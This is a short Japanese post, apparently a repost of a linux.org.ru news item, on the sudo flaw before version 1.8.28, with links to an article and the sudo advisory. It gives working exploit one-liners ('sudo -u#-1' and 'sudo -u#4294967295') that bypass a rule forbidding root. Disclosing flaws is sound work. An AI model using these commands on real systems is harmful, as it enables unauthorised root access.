sudo のバグにより、/etc/sudoers が他のユーザーとしての実行を許可し、root での実行が禁止されている場合、任意の実行可能ファイルを root として実行できます。
このエラーを悪用するのは非常に簡単です。
sudo -u#-1 id -u
または
sudo -u#4294967295 id -u
このバグは 1.8.28 より前のすべてのバージョンの sudo に存在します。
詳細:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
出所: linux.org.ru